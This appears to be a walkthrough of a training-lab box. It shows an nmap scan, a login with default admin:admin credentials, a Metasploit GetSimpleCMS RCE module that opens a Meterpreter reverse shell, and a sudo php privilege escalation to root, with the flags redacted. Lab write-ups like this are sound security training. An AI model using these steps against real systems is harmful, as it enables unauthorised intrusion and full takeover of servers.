Skip to content

Knowledge Check

Question

Spawn the target, gain a foothold and submit the contents of the user.txt flag.

📋 Walkthrough

Let's nmap on the target 

nmap -sVC [IP]
The output: 
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
|   256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_  256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/admin/
|_http-title: Welcome to GetSimple! - gettingstarted
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We see a website on port 80 with a robots.txt entry, named admin. Going in admin page, we see a login. Let's try admin:admin. It works. We can see on the footer GetSimple CMS – Version 3.3.15. On Settings page, We can see a URL http://gettingstarted.htb/, add it in /etc/hosts. I see a metasploit exploit searching online 
msfconsole
Search for exploit 
msf6 > search getsimplecms

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/webapp/get_simple_cms_upload_exec    2014-01-04       excellent  Yes    GetSimpleCMS PHP File Upload Vulnerability
   1  exploit/multi/http/getsimplecms_unauth_code_exec  2019-04-28       excellent  Yes    GetSimpleCMS Unauthenticated RCE

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) >
Let's configure options RHOSTS and LHOST and run script. 
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run

[*] Started reverse TCP handler on 10.10.14.125:4444 
[*] Sending stage (39927 bytes) to 10.129.175.103
[*] Meterpreter session 1 opened (10.10.14.125:4444 -> 10.129.175.103:34542) at 2024-08-24 15:18:19 +0000

meterpreter >
In mrb3n's home folder, we get the user.txt flag

Answer

[REDACTED]

Question

After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.

📋 Walkthrough

Let's see what We do with sudo -l 

sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
We can use php! We can use a nice website named GTFOBins to see what we can do when we can run php as sudo. 
CMD="/bin/sh"
sudo php -r "system('$CMD');"
whoami
root
We can find root.txt in /root/ folder.

Answer

[REDACTED]